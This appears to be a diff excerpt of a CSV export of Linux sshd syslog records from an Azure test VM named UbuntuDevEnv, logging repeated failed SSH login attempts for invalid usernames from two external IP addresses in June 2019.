+12246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:11:41,UbuntuDevEnv,2019-06-26 03:11:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,109647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:11:41,UbuntuDevEnv,2019-06-26 03:11:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,109647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:11:43,UbuntuDevEnv,2019-06-26 03:11:43,auth,UbuntuDevEnv,info,Failed password for invalid user ravi from 43.242.215.70 port 10802 ssh2,109647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ravi,43.242.215.7,10802,,
+12249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:11:43,UbuntuDevEnv,2019-06-26 03:11:43,auth,UbuntuDevEnv,info,Disconnected from invalid user ravi 43.242.215.70 port 10802 [preauth],109647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ravi,43.242.215.7,10802,,
+12250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:11:43,UbuntuDevEnv,2019-06-26 03:11:43,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 10802:11: Bye Bye [preauth],109647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,10802,,
+12251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:13:40,UbuntuDevEnv,2019-06-26 03:13:39,auth,UbuntuDevEnv,info,Invalid user bx from 43.242.215.70 port 16050,110068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bx,43.242.215.7,16050,,
+12252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:13:40,UbuntuDevEnv,2019-06-26 03:13:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:13:40,UbuntuDevEnv,2019-06-26 03:13:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,110068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:13:42,UbuntuDevEnv,2019-06-26 03:13:41,auth,UbuntuDevEnv,info,Failed password for invalid user bx from 43.242.215.70 port 16050 ssh2,110068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bx,43.242.215.7,16050,,
+12255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:13:42,UbuntuDevEnv,2019-06-26 03:13:41,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 16050:11: Bye Bye [preauth],110068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,16050,,
+12256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:13:42,UbuntuDevEnv,2019-06-26 03:13:41,auth,UbuntuDevEnv,info,Disconnected from invalid user bx 43.242.215.70 port 16050 [preauth],110068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bx,43.242.215.7,16050,,
+12257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:15:38,UbuntuDevEnv,2019-06-26 03:15:37,auth,UbuntuDevEnv,info,Invalid user redmine from 43.242.215.70 port 20919,110574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,43.242.215.7,20919,,
+12258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:15:38,UbuntuDevEnv,2019-06-26 03:15:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:15:38,UbuntuDevEnv,2019-06-26 03:15:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,110574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:15:39,UbuntuDevEnv,2019-06-26 03:15:39,auth,UbuntuDevEnv,info,Failed password for invalid user redmine from 43.242.215.70 port 20919 ssh2,110574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,43.242.215.7,20919,,
+12261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:15:40,UbuntuDevEnv,2019-06-26 03:15:39,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 20919:11: Bye Bye [preauth],110574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,20919,,
+12262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:15:40,UbuntuDevEnv,2019-06-26 03:15:39,auth,UbuntuDevEnv,info,Disconnected from invalid user redmine 43.242.215.70 port 20919 [preauth],110574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,redmine,43.242.215.7,20919,,
+12263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:17:39,UbuntuDevEnv,2019-06-26 03:17:38,auth,UbuntuDevEnv,info,Invalid user matthieu from 43.242.215.70 port 39069,110999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,matthieu,43.242.215.7,39069,,
+12264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:17:39,UbuntuDevEnv,2019-06-26 03:17:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,110999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:17:39,UbuntuDevEnv,2019-06-26 03:17:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,110999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:17:41,UbuntuDevEnv,2019-06-26 03:17:40,auth,UbuntuDevEnv,info,Failed password for invalid user matthieu from 43.242.215.70 port 39069 ssh2,110999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,matthieu,43.242.215.7,39069,,
+12267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:17:41,UbuntuDevEnv,2019-06-26 03:17:41,auth,UbuntuDevEnv,info,Disconnected from invalid user matthieu 43.242.215.70 port 39069 [preauth],110999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,matthieu,43.242.215.7,39069,,
+12268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:17:41,UbuntuDevEnv,2019-06-26 03:17:41,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 39069:11: Bye Bye [preauth],110999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,39069,,
+12269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:19:39,UbuntuDevEnv,2019-06-26 03:19:38,auth,UbuntuDevEnv,info,Invalid user webtool from 43.242.215.70 port 48215,111795,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webtool,43.242.215.7,48215,,
+12270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:19:39,UbuntuDevEnv,2019-06-26 03:19:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,111795,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:19:39,UbuntuDevEnv,2019-06-26 03:19:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,111795,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:19:41,UbuntuDevEnv,2019-06-26 03:19:41,auth,UbuntuDevEnv,info,Failed password for invalid user webtool from 43.242.215.70 port 48215 ssh2,111795,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webtool,43.242.215.7,48215,,
+12273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:19:41,UbuntuDevEnv,2019-06-26 03:19:41,auth,UbuntuDevEnv,info,Disconnected from invalid user webtool 43.242.215.70 port 48215 [preauth],111795,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webtool,43.242.215.7,48215,,
+12274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:19:41,UbuntuDevEnv,2019-06-26 03:19:41,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 48215:11: Bye Bye [preauth],111795,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,48215,,
+12275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:20:29,UbuntuDevEnv,2019-06-26 03:20:28,auth,UbuntuDevEnv,info,Invalid user ubuntu from 118.24.131.236 port 42794,111972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,118.24.131.2,42794,,
+12276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:20:29,UbuntuDevEnv,2019-06-26 03:20:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,111972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:20:29,UbuntuDevEnv,2019-06-26 03:20:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,111972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:20:32,UbuntuDevEnv,2019-06-26 03:20:31,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 118.24.131.236 port 42794 ssh2,111972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,118.24.131.2,42794,,
+12279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:20:32,UbuntuDevEnv,2019-06-26 03:20:31,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 118.24.131.236 port 42794 [preauth],111972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,118.24.131.2,42794,,
+12280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:20:32,UbuntuDevEnv,2019-06-26 03:20:31,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 42794:11: Bye Bye [preauth],111972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,42794,,
+12281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:21:39,UbuntuDevEnv,2019-06-26 03:21:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70  user=backup,112221,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,43.242.215.7,,0,
+12282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:21:41,UbuntuDevEnv,2019-06-26 03:21:40,auth,UbuntuDevEnv,info,Failed password for backup from 43.242.215.70 port 22946 ssh2,112221,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,22946,,
+12283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:21:41,UbuntuDevEnv,2019-06-26 03:21:40,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 43.242.215.70 port 22946 [preauth],112221,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,43.242.215.7,22946,,
+12284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:21:41,UbuntuDevEnv,2019-06-26 03:21:40,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 22946:11: Bye Bye [preauth],112221,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,22946,,
+12285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:34,UbuntuDevEnv,2019-06-26 03:23:33,auth,UbuntuDevEnv,info,Invalid user harrison from 43.242.215.70 port 23511,112627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,harrison,43.242.215.7,23511,,
+12286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:34,UbuntuDevEnv,2019-06-26 03:23:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,112627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:34,UbuntuDevEnv,2019-06-26 03:23:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,112627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:36,UbuntuDevEnv,2019-06-26 03:23:35,auth,UbuntuDevEnv,info,Failed password for invalid user harrison from 43.242.215.70 port 23511 ssh2,112627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,harrison,43.242.215.7,23511,,
+12289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:36,UbuntuDevEnv,2019-06-26 03:23:35,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 23511:11: Bye Bye [preauth],112627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,23511,,
+12290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:36,UbuntuDevEnv,2019-06-26 03:23:35,auth,UbuntuDevEnv,info,Disconnected from invalid user harrison 43.242.215.70 port 23511 [preauth],112627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,harrison,43.242.215.7,23511,,
+12291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:23:51,UbuntuDevEnv,2019-06-26 03:23:50,auth,UbuntuDevEnv,info,Did not receive identification string from 118.24.131.236 port 36548,112692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,36548,,
+12292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:25:31,UbuntuDevEnv,2019-06-26 03:25:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,113042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:25:31,UbuntuDevEnv,2019-06-26 03:25:31,auth,UbuntuDevEnv,info,Invalid user hu from 43.242.215.70 port 33317,113042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hu,43.242.215.7,33317,,
+12294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:25:31,UbuntuDevEnv,2019-06-26 03:25:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,113042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:25:33,UbuntuDevEnv,2019-06-26 03:25:33,auth,UbuntuDevEnv,info,Failed password for invalid user hu from 43.242.215.70 port 33317 ssh2,113042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hu,43.242.215.7,33317,,
+12296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:25:34,UbuntuDevEnv,2019-06-26 03:25:33,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 33317:11: Bye Bye [preauth],113042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,33317,,
+12297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:25:34,UbuntuDevEnv,2019-06-26 03:25:33,auth,UbuntuDevEnv,info,Disconnected from invalid user hu 43.242.215.70 port 33317 [preauth],113042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hu,43.242.215.7,33317,,
+12298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:27:31,UbuntuDevEnv,2019-06-26 03:27:31,auth,UbuntuDevEnv,info,Invalid user teamspeak from 43.242.215.70 port 11613,113467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,43.242.215.7,11613,,
+12299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:27:31,UbuntuDevEnv,2019-06-26 03:27:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,113467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:27:31,UbuntuDevEnv,2019-06-26 03:27:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,113467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:27:33,UbuntuDevEnv,2019-06-26 03:27:32,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak from 43.242.215.70 port 11613 ssh2,113467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,43.242.215.7,11613,,
+12302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:27:33,UbuntuDevEnv,2019-06-26 03:27:33,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak 43.242.215.70 port 11613 [preauth],113467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,43.242.215.7,11613,,
+12303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:27:33,UbuntuDevEnv,2019-06-26 03:27:33,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 11613:11: Bye Bye [preauth],113467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,11613,,
+12304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:29:29,UbuntuDevEnv,2019-06-26 03:29:29,auth,UbuntuDevEnv,info,Invalid user nicholas from 43.242.215.70 port 63406,113882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,43.242.215.7,63406,,
+12305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:29:29,UbuntuDevEnv,2019-06-26 03:29:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,113882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
